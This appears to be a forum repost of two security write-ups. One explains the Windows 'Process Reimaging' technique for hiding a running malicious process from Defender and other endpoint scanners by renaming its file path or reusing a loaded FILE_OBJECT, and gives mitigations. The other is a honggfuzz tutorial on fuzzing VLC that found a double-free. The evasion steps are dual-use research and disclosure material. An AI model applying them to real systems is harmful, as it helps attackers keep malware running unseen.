If the antivirus scanner is active at the point of load, it can use any one of steps 1, 2 and 4 above to protect the operating system against malicious code.
If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading. There is currently no documented method to securely identify the underlying file associated with a running process on Windows, due to Windows' inability to retrieve the correct image filepath from the NTDLL APIs.

This can be shown to evade Defender (MpMsEng.exe/MpEngine.dll) where the file being executed is a "Potentially Unwanted Program" such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects it correctly at phase 1 or 2. If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process.

Subverting Trust

The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS endpoints (Figure 1 – Mitre Enterprise ATT&CK). Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion by using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging, with the objective of impersonating trusted processes. There are other process manipulation techniques, as documented by Mitre ATT&CK and the Unprotect Project, but we will focus on Process Hollowing and Process Doppelganging.

Process manipulation techniques exploit legitimate features of the Windows operating system to impersonate trusted process executable binaries and generally require code injection. ESSs place inherent trust in the Windows operating system for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs' trust in the Windows operating system can be subverted for digital signature validation. Similarly, Process Reimaging subverts an ESS's trust in the Windows operating system for process attribute verification. When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS's trusted infrastructure.

McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, to associated campaigns. This insight helps organizations understand adversaries' behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities.
Process Manipulation Techniques (SynAck Ransomware)

McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging, with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques so that they can be compared to Process Reimaging based on a real-world observation. Process manipulation defense evasion techniques continue to evolve; Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows operating system, they can be difficult to defend against if the antivirus scanner does not block prior to process launch.

Process Hollowing

"Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis." (Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing)

Process Doppelganging

"Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext." (Figure 3 – SynAck Ransomware Defense Evasion with Doppelganging)

Process Reimaging Weaponization

The Windows kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. This allows an adversary to persist a malicious process (post-exploitation) by hiding the physical location of the process EXE (Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging).

Process Reimaging Technical Deep Dive

NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel, and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in the EPROCESS structure. The EPROCESS structure contains filename and path information at the following fields/offsets (Figure 5 – Code Complexity IDA graph displaying NtQueryInformationProcess filename APIs within NTDLL):

+0x3b8 SectionObject (filename and path)
+0x448 ImageFilePointer* (filename and path)
+0x450 ImageFileName (filename)
+0x468 SeAuditProcessCreationInfo (filename and path)

* this field is only present in Windows 10

Kernel API NtQueryInformationProcess is consumed by the following kernelbase/NTDLL APIs:

K32GetModuleFileNameEx
K32GetProcessImageFileName
QueryFullProcessImageName

The VADs hold a pointer to the FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (Figure 6 – Code Complexity IDA graph displaying the NtQueryVirtualMemory filename API within NTDLL). Kernel API NtQueryVirtualMemory is consumed by the following kernelbase/NTDLL API:

GetMappedFileName

Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes for some of the above fields.
The VADs reflect any filename change for a loaded image after process creation, but they don't reflect any rename of the filepath. The EPROCESS fields also fail to reflect any renaming of the process filepath, and only the ImageFilePointer field reflects a filename change. As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other applications (see Table 1 – OS/kernel version and API matrix).

Prerequisites for all Attack Vectors

Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite as for the Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework.

Process Reimaging Attack Vectors

FILE_OBJECT Filepath Changes

Simply renaming the filepath of an executing process results in the Windows OS returning incorrect image location information for all APIs (Figure 7 – Filepath changes impact all Windows OS versions). This impacts all Windows OS versions at the time of testing.

FILE_OBJECT Filename Changes

Filename Change >= Windows 10

Simply renaming the filename of an executing process results in the Windows OS returning incorrect image information for the K32GetProcessImageFileName API (Figure 8.1.1 – Filename changes impact Windows >= Windows 10). This has been confirmed to impact Windows 10 only.

Per Figure 8.1.2 (NtQueryInformationProcess on Windows 10 RS1 x64, ntoskrnl version 10.0.14393.0), GetModuleFileNameEx and QueryFullProcessImageName will get the correct filename changes due to a new EPROCESS field, ImageFilePointer, at offset 0x448. The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer at offset 0x448 into the EPROCESS structure.

Filename Change < Windows 10

Simply renaming the filename of an executing process results in the Windows OS returning incorrect image information for the K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageName APIs (Figure 8.2.1 – Filename changes impact Windows < Windows 10). This has been confirmed to impact Windows 7 and Windows 8.

Per Figure 8.2.2 (NtQueryInformationProcess on Windows 7 SP1 x64, ntoskrnl version 6.1.7601.17514), GetModuleFileNameEx and QueryFullProcessImageName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8, SectionObject).

LoadLibrary FILE_OBJECT Reuse

LoadLibrary FILE_OBJECT reuse leverages the fact that when LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary. The exact sequence is:

1. LoadLibrary (path\filename)
2. FreeLibrary (path\filename)
3. LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename)

This results in Windows creating a VAD entry in the process at step 3 above which reuses the same FILE_OBJECT, still in process memory, created at step 1 above. The VAD now has incorrect filepath information for the file on disk, and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question.
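A minimal sketch of observing the stale-path behaviour described above, from the point of view of a scanner that relies on the affected APIs. It assumes a Windows host and a process whose on-disk path you have renamed after launch; the PID is a placeholder. Note the returned value is an NT device path, so a real check would translate it to a DOS path before testing for existence on disk.

import ctypes

# Windows-only sketch: query a process image path the same way an ESS
# relying on (K32)GetProcessImageFileName would. After a Process
# Reimaging rename, this keeps returning the old, now-stale path.
psapi = ctypes.WinDLL("psapi")
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

def reported_image_path(pid: int) -> str:
    handle = kernel32.OpenProcess(
        PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    buf = ctypes.create_unicode_buffer(4096)
    psapi.GetProcessImageFileNameW(handle, buf, len(buf))
    kernel32.CloseHandle(handle)
    return buf.value  # NT path, e.g. \Device\HarddiskVolume2\...\a.exe

print(reported_image_path(1234))  # hypothetical PID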
The following prerequisites are required to evade detection successfully:

- The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary.
- The filepath must be renamed (dropping the same file into a newly created path will not work).

The Process Reimaging technique can be used in two ways with the LoadLibrary FILE_OBJECT reuse attack vector:

1. LoadLibrary (Figure 9 – LoadLibrary FILE_OBJECT reuse via LoadLibrary impacts all Windows OS versions): when an ESS or application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause the Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

2. CreateProcess (Figure 10 – LoadLibrary FILE_OBJECT reuse via CreateProcess impacts all Windows OS versions): when an ESS or application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause the Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Process Manipulation Techniques Comparison

Windows Defender Process Reimaging Filepath Bypass Demo

The demo video simulates a zero-day malware (a Mimikatz PUP sample) being dropped to disk and executed as the malicious process "phase1.exe". Using the Process Reimaging filepath attack vector, we demonstrate that even if Defender is updated with a signature for the malware on disk, it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender Real-time Protection (used by consumers and also enterprises), the malicious process can dwell on a Windows machine until a reboot or until the machine receives a full scan after a signature update.

CVSS and Protection Recommendations

CVSS

If a product uses any of the APIs listed in Table 1 for the following use cases, then it is likely vulnerable:

- Process reputation of a remote process – any product using the APIs to determine whether executing code is from a malicious file on disk. CVSS score 5.0 (Medium), the same score as Doppelganging: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N
- Trust verification of a remote process – any product using the APIs to verify trust of a calling process. The CVSS score will be higher than 5.0; scoring is specific to the Endpoint Security Solution architecture.

Protection Recommendations

McAfee Advanced Threat Research submitted the Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 cumulative update, covering the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions.

New and existing process manipulation techniques which abuse legitimate operating system features for defense evasion are difficult to prevent dynamically by monitoring specific API calls, as this can lead to false positives such as preventing legitimate processes from executing. A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan, which may provide deeper insight.
Mitigations recommended to Microsoft

File system synchronization (EPROCESS structures out of sync with the file system or File Control Block (FCB) structure):

- Allow the EPROCESS structure fields to reflect filepath changes, as is currently implemented for the filename in the VADs and the EPROCESS ImageFilePointer field. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, such as those behind K32GetModuleFileNameEx on Windows 10 through the ImageFilePointer.

API usage (most APIs return file information from process creation time):

- Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get the process image filename and path when it should be using K32GetModuleFileNameEx.
- Consolidate the duplicate APIs exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that need to retrieve process filename information (for example, clearly state that GetMappedFileName should only be used for DLLs and not for the EXE backing a process).
- Differentiate in each API's description whether it is limited to retrieving the filename and path as of process creation, or retrieves them in real time at the moment of the request.

Filepath locking:

- Lock the filepath and name while a process is executing, similar to how file modification is locked, to prevent modification. A standard user, at a minimum, should not be able to rename binary paths for an associated executing process.

Reuse of an existing FILE_OBJECT with the LoadLibrary API (prevent Process Reimaging):

- LoadLibrary should verify that any existing FILE_OBJECT it reuses has the most up-to-date filepath at load time.

A short-term mitigation is that Defender should at least flag that it found malicious process activity but couldn't find the associated malicious file on disk (right now it fails open, providing no notification of any potential threats found in memory or on disk).

Mitigation recommended to Endpoint Security Vendors

The FILE_OBJECT ID must be tracked from FileCreate, as the process closes its handle for the filename by the time the image is loaded at ImageLoad. This ID must be managed by the endpoint security vendor so that it can be leveraged to determine whether a process has been reimaged when performing process attribute verification.

Sursa: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/
  6. Introduction

I spent three months working on VLC using honggfuzz, tweaking it to suit the target. In the process, I found five vulnerabilities, one of which was a high-risk double-free issue and merited CVE-2019-12874. Here's the VLC advisory: https://www.videolan.org/security/sa1901.html. Here's how I found it. I hope you find the how-to useful and that it inspires you to get fuzzing.

Background

VLC

VLC is a free, open-source, portable, cross-platform media player and streaming media server, developed by the VideoLAN project. Media players such as VLC usually have a very complex codebase, including parsing and support for a large number of media file formats, math calculations, codecs, demuxers, text renderers and more. (Figure 1: loaded modules within the VLC binary.)

honggfuzz

For this project I used honggfuzz, a modern, feedback-driven fuzzer based on code coverage, developed by Robert Swiecki. Why honggfuzz? It provides an easy way to instrument a target (unfortunately that did not work for this target, but we will see how I was able to overcome those issues), it has some very powerful options such as mutating only a set number of bytes (using the -F parameter), it has an easy-to-use command line, and it uses AddressSanitizer instrumentation for software coverage, saving all the unique crashes as well as the coverage files which hit new code blocks. It would be very difficult to discover these bugs without code coverage; given the complexity of the code, I would probably never be able to hit those paths!

Getting VLC and building it

VLC depends on many libraries and external projects. On an Ubuntu system, this is easily solved by just getting all the dependencies via apt:

$ apt-get build-dep vlc

(If you're on Ubuntu, make sure to also install the libxcb-xkb-dev package.)

Now I'll grab the source code – remember you want to be running the very latest version! While you're there, let's run bootstrap, which will generate the makefiles for our platform:

$ git clone https://github.com/videolan/vlc
$ ./bootstrap

Once that's done, I also want to add support for AddressSanitizer. Unfortunately, passing --with-sanitizer=address when issuing the configure command is not enough, as it will give errors just before compilation finishes due to missing compilation flags. As such, I need to revert the following commit so I can compile VLC successfully and add AddressSanitizer instrumentation:

$ git revert e85682585ab27a3c0593c403b892190c52009960

Getting samples

First things first, I need to start by getting decent samples. As luck would have it, the FFmpeg test suite already has a massive set of decent samples (that may or may not crash FFmpeg) which will help me get started. For this iteration I tried to fuzz the .mkv format, so the following command quickly gave decent initial seed files:

$ wget -r https://samples.ffmpeg.org/ -A mkv

(Figure 2: getting samples with wget.)

Once there are a decent number of samples, the next step is to keep only relatively small samples, such as those under 5 MB:

$ find . -name "*.mkv" -type f -size -5M -exec mv -f {} ~/Desktop/mkv_samples/ \;

Code Coverage (using GCC)

Once we have our samples, we need to verify whether our initial seed does indeed give us decent coverage – the more code lines/blocks we hit, the better our chances of finding a bug. Let's compile VLC using GCC's coverage flags:

$ CC=gcc CXX=g++ ./configure --enable-debug --enable-coverage
$ make -j8

Once compilation is successful, we can confirm that we have the gcno files:

$ find . -name *.gcno
At this phase, we are ready to run our seed files one by one and get some nice graphs. Depending on the samples and movie lengths, we need a way to play X seconds and then exit VLC cleanly, otherwise we're going to be here all night! Luckily, VLC already has two parameters for this: --play-and-exit and --run-time=n (where n is a number of seconds). Let's quickly navigate back to our samples folder and run this little bash script:

#!/bin/bash

FILES=/home/symeon/Desktop/vlc_samples-master/honggfuzz_coverage/*.mkv
for f in $FILES
do
    echo "[*] Processing $f file..."
    ASAN_OPTIONS=detect_leaks=0 timeout 5 ./vlc-static --play-and-exit --run-time=5 "$f"
done

Once executed, you should see VLC playing 5 seconds of each video, exiting, and then looping over the videos one by one. Continuing, we are going to use @ea_foundation's covnavi, a little tool which gets all the coverage information and does all the heavy lifting for you. (Figure 3: generating coverage using gcov.)

Notice that a new folder, web, has been created. If you open index.html with your favourite browser, navigate to demux/mkv and take a look at the initial coverage. With our basic sample set, we managed to hit 45.1% of lines and 33.9% of functions! (Figure 4: initial coverage after running the initial seed files.)

Excellent, we can confirm that we have a decent amount of coverage and we are ready to move on to fuzzing!

The harness

While searching the documentation, it turns out that VLC provides sample API code which can be used to play a media file for a few seconds and then shut down the player. That's exactly what we are looking for! They have also provided an extensive list of all the modules, which can be found here.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> /* for sleep() */
#include <vlc/vlc.h>

int main(int argc, char* argv[])
{
    libvlc_instance_t *inst;
    libvlc_media_player_t *mp;
    libvlc_media_t *m;

    if (argc < 2) {
        printf("usage: %s <input>\n", argv[0]);
        return 0;
    }

    /* Load the VLC engine */
    inst = libvlc_new(0, NULL);

    /* Create a new item */
    m = libvlc_media_new_path(inst, argv[1]);

    /* Create a media player playing environment */
    mp = libvlc_media_player_new_from_media(m);

    /* No need to keep the media now */
    libvlc_media_release(m);

    /* play the media_player */
    libvlc_media_player_play(mp);

    sleep(2); /* Let it play a bit */

    /* Stop playing */
    libvlc_media_player_stop(mp);

    /* Free the media_player */
    libvlc_media_player_release(mp);
    libvlc_release(inst);

    return 0;
}

In order to compile the above harness, we need to link against our freshly compiled library. Navigate to /etc/ld.so.conf.d, create a new file libvlc.conf, and include the path of the libvlc libraries:

/home/symeon/vlc-coverage/lib/.libs

Make sure to execute ldconfig to update the linker cache. Now let's compile the harness using our fresh libraries and link it against ASan:

$ hfuzz-clang harness.c -I/home/symeon/Desktop/vlc/include -L/home/symeon/Desktop/vlc/lib/.libs -o harness -lasan -lvlc

After compiling and executing our harness, unfortunately it crashes, making it impossible to use for our fuzzing purposes. (Figure 5: VLC harness crashing in the config_getPsz function.)

Interestingly enough, by installing the libvlc-dev package (from the Ubuntu repository) and linking against that library, the harness executes successfully. However, this is not that useful for us, as we would not have any coverage at all, something that we don't want. For our next step, let's try to instrument the whole VLC binary using clang!
Instrumenting VLC with honggfuzz (clang coverage)

Since our previous method did not quite work, let's try to compile VLC with honggfuzz's instrumentation. For this, I will be using the latest clang as well as the compiler-rt runtime libraries, which add support for code coverage.

$:~/vlc-coverage/bin$ clang --version
clang version 9.0.0 (https://github.com/llvm/llvm-project.git 281a5beefa81d1e5390516e831c6a08d69749791)
Target: x86_64-unknown-linux-gnu
Thread model: posix
InstalledDir: /home/symeon/Desktop/llvm-project/build/bin

Following honggfuzz's feedback-driven instructions, we run the following commands, enabling AddressSanitizer as well:

$ export CC=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang
$ export CXX=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang++
$ ./configure --enable-debug --with-sanitizer=address

Once the configuration succeeds, let's try to compile:

$ make -j4

After a while, however, compilation fails:

<scratch space>:231:1: note: expanded from here
VLC_COMPILER
^
../config.h:785:34: note: expanded from macro 'VLC_COMPILER'
#define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.o...
^
3 errors generated.
make[3]: *** [Makefile:3166: version.lo] Error 1
make[3]: *** Waiting for unfinished jobs....
make[3]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src'
make[2]: *** [Makefile:2160: all] Error 2
make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src'
make[1]: *** [Makefile:1567: all-recursive] Error 1
make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc'
make: *** [Makefile:1452: all] Error 2

Looking at the config.log, we can see the following:

#define VLC_COMPILE_BY "symeon"
#define VLC_COMPILE_HOST "ubuntu"
#define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.out /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crt1.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/8/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/8 -L/usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/8/../../..
-L/home/symeon/Desktop/llvm-project/build/bin/../lib -L/lib -L/usr/lib --whole-archive /home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a --no-whole-archive --dynamic-list=/home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a.syms --wrap=strcmp --wrap=strcasecmp --wrap=strncmp --wrap=strncasecmp --wrap=strstr --wrap=strcasestr --wrap=memcmp --wrap=bcmp --wrap=memmem --wrap=strcpy --wrap=ap_cstr_casecmp --wrap=ap_cstr_casecmpn --wrap=ap_strcasestr --wrap=apr_cstr_casecmp --wrap=apr_cstr_casecmpn --wrap=CRYPTO_memcmp --wrap=OPENSSL_memcmp --wrap=OPENSSL_strcasecmp --wrap=OPENSSL_strncasecmp --wrap=memcmpct --wrap=xmlStrncmp --wrap=xmlStrcmp --wrap=xmlStrEqual --wrap=xmlStrcasecmp --wrap=xmlStrncasecmp --wrap=xmlStrstr --wrap=xmlStrcasestr --wrap=memcmp_const_time --wrap=strcsequal -u HonggfuzzNetDriver_main -u LIBHFUZZ_module_instrument -u LIBHFUZZ_module_memorycmp /tmp/libhfnetdriver.1000.419f7f6c4058b450.a /tmp/libhfuzz.1000.746a32a18d2c8f8a.a /tmp/libhfnetdriver.1000.419f7f6c4058b450.a --no-as-needed -lpthread -lrt -lm -ldl -lgcc --as-needed -lgcc_s --no-as-needed -lpthread -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/8/crtend.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crtn.o" Apparently, something breaks the VLC_COMPILER variable and thus instrumentation fails. Let’s not give up, and proceed with the compilation using the following command: $ make clean $ CC=clang CXX=clang++ CFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" CXXFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" ./configure --enable-debug --with-sanitizer=address $ ASAN_OPTIONS=detect_leaks=0 make -j8 will give us the following output: GEN ../modules/plugins.dat make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/bin' Making all in test make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Nothing to be done for 'all'. make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc' GEN cvlc GEN rvlc GEN nvlc GEN vlc make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' Now although the compilation is successful, the binaries are missing honggfuzz’s instrumentation. As such, we need to remove the existing vlc_static binary, and manually link it with libhfuzz library. To do that, we need to figure out where linkage of the binary occurs. Let’s remove the vlc-static binary: $ cd bin $ rm vlc-static And run strace while compiling/linking the vlc-binary: $ ASAN_OPTIONS=detect_leaks=0 strace -s 1024 -f -o compilation_flags.log make CCLD vlc-static GEN ../modules/plugins.dat The above command, will specify the maximum string size to 1024 characters (default is 32), and will save all the output to specified file. Opening the log file and looking for “-o vlc-static” gives us the following result: -- snip -- 103391 <... 
wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 103392 103391 rt_sigprocmask(SIG_BLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 vfork( <unfinished ...> 103393 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 103393 prlimit64(0, RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}, NULL) = 0 103393 execve("/bin/bash", ["/bin/bash", "-c", "echo \" CCLD \" vlc-static;../doltlibtool --silent --tag=CC --mode=link clang - DTOP_BUILDDIR=\\\"$(cd \"..\"; pwd)\\\" -DTOP_SRCDIR=\\\"$(cd \"..\"; pwd)\\\" -fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -fsanitize=address -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la "], 0x5565fb56ae10 /* 59 vars */ <unfinished ...> 103391 <... vfork resumed> ) = 103393 103391 rt_sigprocmask(SIG_UNBLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 wait4(-1, <unfinished ...> 103393 <... execve resumed> ) = 0 103393 brk(NULL) = 0x557581212000 Bingo! We managed to find the compilation flags and libraries that vlc-static requires. The final step is to link against libhfuzz.a’s library by issuing the following command: $ ~/vlc-coverage/bin$ ../doltlibtool --tag=CC --mode=link clang -DTOP_BUILDDIR="/home/symeon/vlc-coverage" -DTOP_SRCDIR="/home/symeon/vlc-coverage" -fsanitize-coverage=trace-pc-guard,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la -Wl,--whole-archive -L/home/symeon/Desktop/honggfuzz/libhfuzz/ -lhfuzz -u,LIBHFUZZ_module_instrument -u,LIBHFUZZ_module_memorycmp -Wl,--no-whole-archive As a last step, let’s confirm that the vlc_static binary includes libhfuzz’s symbols: $ ~/vlc-coverage/bin$ nm vlc-static | grep LIBHFUZZ Figure 6: Examining the symbols and linkage of Libhfuzz.a library. Fuzzing it! For this part, we will be using one VM with 100GB RAM and 8 cores! Figure 7: Monster VM ready to fuzz VLC. With the instrumented binary, let’s copy it over to our ramdisk (/run/shm), copy over the samples and start fuzzing it! $ cp ./vlc-static /run/shm $ cp -r ./mkv_samples /run/shm Now fire it up as below, -f is the folder with our samples, and -F will limit to maximum 16kB. $ honggfuzz -f mkv_samples -t 5 -F 16536 -- ./vlc-static --play-and-exit --run-time=4 ___FILE___ If everything succeeds, you should be getting massive coverage for both edge and pc similar to the screenshot below: Figure 8: Honggfuzz fuzzing the instrumented binary and getting coverage information. 
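A few honggfuzz flags are worth knowing at this point (hedged; defaults differ between versions, so check honggfuzz --help on your build): -n sets the number of fuzzing threads, -W redirects crashes and reports into a separate workspace directory, and --covdir_all, which we will lean on later, stores every input that produced new coverage. A sketch of a slightly tidier invocation along those lines:

$ mkdir -p /run/shm/crashes /run/shm/cov
$ honggfuzz -f mkv_samples -t 5 -F 16536 -n 8 -W /run/shm/crashes --covdir_all /run/shm/cov -- ./vlc-static --play-and-exit --run-time=4 ___FILE___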
Hopefully within a few hours you should get your first crash, which can be found in the same directory where honggfuzz was executed (unless modified), along with a text file, HONGGFUZZ.REPORT.TXT, containing information such as the honggfuzz arguments, the date of the crash and the faulting instruction, as well as the stack trace.

Figure 9: honggfuzz displaying information regarding the crash.

Crash results/triaging

After three days of fuzzing, honggfuzz discovered a few interesting crashes: SIGSEGV, SIGABRT and SIGFPE. Despite the signal names, running the crashers under AddressSanitizer (we have already instrumented VLC) revealed that these bugs were in fact mostly heap-based out-of-bounds read vulnerabilities. We can simply loop through the crashers with the previously instrumented binary using this simple bash script:

$ cat asan_triage.sh
#!/bin/bash

FILES=/home/symeon/Desktop/crashers/*
OUTPUT=asan.txt
for f in $FILES
do
    echo "[*] Processing $f file..." >> $OUTPUT 2>&1
    ASAN_OPTIONS=detect_leaks=0,verbosity=1 timeout 12 ./vlc-static --play-and-exit --run-time=10 "$f" >>$OUTPUT 2>&1
done

Figure 10: Quickly triaging the crashes honggfuzz found.
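Once the script has produced asan.txt, it can help to bucket the crashes by their top meaningful stack frame so that duplicates collapse into one line each. A rough, hedged sketch; it simply counts the frame-#1 source locations in the output file:

$ grep "#1 0x" asan.txt | awk '{print $NF}' | sort | uniq -c | sort -rn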
Once you run it, you shouldn't see any output, since we are redirecting all output and errors to the asan.txt file. Opening this file quickly reveals the root cause of each crash, along with symbolised stack traces showing where the crash occurred.

$ cat asan.txt | grep AddressSanitizer -A 5
==59237==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5
#0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
#1 0x7f674f0e8610 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9
#2 0x7f672fde9dac in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5
#3 0x7f672fc3f494 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2
#4 0x7f672fc3f2d0 in std::unique_ptr<mkv::mkv_track_t, std::default_delete<mkv::mkv_track_t> >::~unique_ptr() /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:274:4
--
SUMMARY: AddressSanitizer: bad-free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 in __interceptor_free
Thread T5 created by T4 here:
#0 0x444dd0 in __interceptor_pthread_create /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors.cc:209:3
